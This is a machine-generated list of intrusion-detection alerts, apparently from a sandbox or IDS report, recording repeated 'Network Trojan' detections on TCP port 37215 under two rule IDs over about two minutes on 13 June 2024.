              SID:2835222
              Source Port:37688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914267
              SID:2835222
              Source Port:55078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026517
              SID:2829579
              Source Port:33588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128352
              SID:2835222
              Source Port:42154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195531
              SID:2829579
              Source Port:41214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254153
              SID:2835222
              Source Port:59810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307525
              SID:2829579
              Source Port:56028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149481
              SID:2829579
              Source Port:49372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239824
              SID:2829579
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228886
              SID:2835222
              Source Port:34516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995259
              SID:2835222
              Source Port:56554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369682
              SID:2829579
              Source Port:42956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506208
              SID:2829579
              Source Port:49594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257045
              SID:2835222
              Source Port:50160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459001
              SID:2829579
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972211
              SID:2835222
              Source Port:59332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098673
              SID:2829579
              Source Port:51906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191377
              SID:2835222
              Source Port:38456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214238
              SID:2835222
              Source Port:43964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248571
              SID:2829579
              Source Port:58574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488635
              SID:2835222
              Source Port:55996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569268
              SID:2835222
              Source Port:34394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708220
              SID:2835222
              Source Port:48586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654420
              SID:2829579
              Source Port:36870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354787
              SID:2835222
              Source Port:33308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278200
              SID:2835222
              Source Port:60154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606880
              SID:2829579
              Source Port:50784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676846
              SID:2835222
              Source Port:39646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214345
              SID:2835222
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045370
              SID:2835222
              Source Port:40090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213226
              SID:2835222
              Source Port:46104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223946
              SID:2829579
              Source Port:55700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.929267
              SID:2829579
              Source Port:47424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757961
              SID:2829579
              Source Port:36036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804251
              SID:2829579
              Source Port:44536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242408
              SID:2829579
              Source Port:51522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546566
              SID:2829579
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344807
              SID:2829579
              Source Port:51192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025384
              SID:2829579
              Source Port:35116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211962
              SID:2835222
              Source Port:42530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112269
              SID:2835222
              Source Port:38308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660797
              SID:2829579
              Source Port:42928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480438
              SID:2829579
              Source Port:41206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091879
              SID:2835222
              Source Port:59362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636147
              SID:2829579
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167136
              SID:2835222
              Source Port:42904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212771
              SID:2835222
              Source Port:59326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423346
              SID:2835222
              Source Port:59460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.453336
              SID:2835222
              Source Port:35094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297936
              SID:2835222
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.154081
              SID:2829579
              Source Port:39504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694078
              SID:2829579
              Source Port:40314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046876
              SID:2829579
              Source Port:54754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269090
              SID:2829579
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835871
              SID:2829579
              Source Port:38924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572395
              SID:2835222
              Source Port:58944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510243
              SID:2835222
              Source Port:46532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228725
              SID:2835222
              Source Port:43488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824706
              SID:2829579
              Source Port:36898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048098
              SID:2829579
              Source Port:38936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424840
              SID:2829579
              Source Port:33944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403640
              SID:2835222
              Source Port:57808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978215
              SID:2829579
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127191
              SID:2829579
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608567
              SID:2829579
              Source Port:54902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176031
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266286
              SID:2835222
              Source Port:44702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057978
              SID:2829579
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320618
              SID:2835222
              Source Port:47936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671627
              SID:2835222
              Source Port:49414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055823
              SID:2829579
              Source Port:59946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.806061
              SID:2835222
              Source Port:36598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247687
              SID:2829579
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724987
              SID:2829579
              Source Port:43252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573021
              SID:2835222
              Source Port:36802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403652
              SID:2829579
              Source Port:58724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453739
              SID:2829579
              Source Port:53894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211934
              SID:2829579
              Source Port:32966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134569
              SID:2835222
              Source Port:37824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630027
              SID:2829579
              Source Port:39118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227164
              SID:2829579
              Source Port:48236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177752
              SID:2835222
              Source Port:36628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406587
              SID:2835222
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993013
              SID:2835222
              Source Port:51468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041150
              SID:2835222
              Source Port:39636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079544
              SID:2835222
              Source Port:39918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456241
              SID:2829579
              Source Port:50252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835089
              SID:2835222
              Source Port:41446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353874
              SID:2835222
              Source Port:57250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508079
              SID:2829579
              Source Port:53800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013138
              SID:2829579
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378026
              SID:2835222
              Source Port:44360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450891
              SID:2829579
              Source Port:43634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839628
              SID:2829579
              Source Port:38514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820944
              SID:2835222
              Source Port:49604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214014
              SID:2829579
              Source Port:57598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212717
              SID:2829579
              Source Port:59224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157271
              SID:2835222
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.190957
              SID:2829579
              Source Port:41020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436561
              SID:2829579
              Source Port:40256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017400
              SID:2835222
              Source Port:41322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409036
              SID:2835222
              Source Port:40962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093759
              SID:2829579
              Source Port:39618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124604
              SID:2835222
              Source Port:37404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132255
              SID:2835222
              Source Port:52560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405873
              SID:2829579
              Source Port:54278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198678
              SID:2835222
              Source Port:44694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659040
              SID:2835222
              Source Port:38256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241970
              SID:2835222
              Source Port:60134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757183
              SID:2835222
              Source Port:60786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439945
              SID:2829579
              Source Port:47846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787582
              SID:2835222
              Source Port:51946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869088
              SID:2835222
              Source Port:55048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568475
              SID:2835222
              Source Port:41038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884499
              SID:2829579
              Source Port:33558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503256
              SID:2829579
              Source Port:43600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804004
              SID:2835222
              Source Port:51008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677685
              SID:2829579
              Source Port:60696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091847
              SID:2835222
              Source Port:41152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508412
              SID:2835222
              Source Port:57640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604815
              SID:2829579
              Source Port:48000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790395
              SID:2835222
              Source Port:51300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241772
              SID:2829579
              Source Port:50698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229748
              SID:2835222
              Source Port:49556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016010
              SID:2829579
              Source Port:37344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440141
              SID:2835222
              Source Port:49582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091972
              SID:2829579
              Source Port:58928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106658
              SID:2829579
              Source Port:41728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725420
              SID:2829579
              Source Port:46694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192385
              SID:2835222
              Source Port:43834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318099
              SID:2835222
              Source Port:47476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130292
              SID:2835222
              Source Port:49250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400722
              SID:2835222
              Source Port:55608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670417
              SID:2835222
              Source Port:45204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976947
              SID:2829579
              Source Port:41456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074676
              SID:2829579
              Source Port:49844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555411
              SID:2835222
              Source Port:37596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216491
              SID:2835222
              Source Port:48286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454943
              SID:2835222
              Source Port:35284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655006
              SID:2835222
              Source Port:46768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275726
              SID:2829579
              Source Port:42428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421822
              SID:2835222
              Source Port:58506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.975780
              SID:2829579
              Source Port:52970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132273
              SID:2835222
              Source Port:52152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823027
              SID:2829579
              Source Port:40842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174100
              SID:2835222
              Source Port:40874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820517
              SID:2829579
              Source Port:48056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611114
              SID:2829579
              Source Port:35202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099140
              SID:2829579
              Source Port:53800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348947
              SID:2829579
              Source Port:48430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357310
              SID:2835222
              Source Port:54256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804205
              SID:2829579
              Source Port:43850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820901
              SID:2829579
              Source Port:56496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869574
              SID:2835222
              Source Port:57872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155663
              SID:2835222
              Source Port:53274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992074
              SID:2835222
              Source Port:48654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671711
              SID:2835222
              Source Port:37774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802783
              SID:2829579
              Source Port:52206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128685
              SID:2829579
              Source Port:58062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710068
              SID:2829579
              Source Port:42550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728053
              SID:2835222
              Source Port:40266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356729
              SID:2835222
              Source Port:35432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839436
              SID:2829579
              Source Port:53982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294576
              SID:2829579
              Source Port:45124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606386
              SID:2835222
              Source Port:35848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089894
              SID:2829579
              Source Port:56528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993753
              SID:2835222
              Source Port:38040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729210
              SID:2829579
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725897
              SID:2829579
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098064
              SID:2829579
              Source Port:52766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402677
              SID:2829579
              Source Port:59332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457860
              SID:2835222
              Source Port:39532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176655
              SID:2829579
              Source Port:53234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835374
              SID:2835222
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478666
              SID:2835222
              Source Port:54540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417954
              SID:2829579
              Source Port:41186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156163
              SID:2835222
              Source Port:43044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093957
              SID:2829579
              Source Port:47220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676065
              SID:2835222
              Source Port:49332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091001
              SID:2835222
              Source Port:54862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404898
              SID:2829579
              Source Port:41328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175617
              SID:2835222
              Source Port:40546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456277
              SID:2835222
              Source Port:46814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419414
              SID:2835222
              Source Port:40306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126898
              SID:2835222
              Source Port:42722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014481
              SID:2835222
              Source Port:40406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211318
              SID:2829579
              Source Port:42940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525374
              SID:2829579
              Source Port:38200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213598
              SID:2835222
              Source Port:48638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607494
              SID:2829579
              Source Port:54760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230577
              SID:2829579
              Source Port:42332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402922
              SID:2835222
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164231
              SID:2829579
              Source Port:38656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248767
              SID:2829579
              Source Port:59374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377624
              SID:2835222
              Source Port:44036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569952
              SID:2829579
              Source Port:43790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573238
              SID:2829579
              Source Port:50276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630202
              SID:2835222
              Source Port:39564
              Destination Port:37215
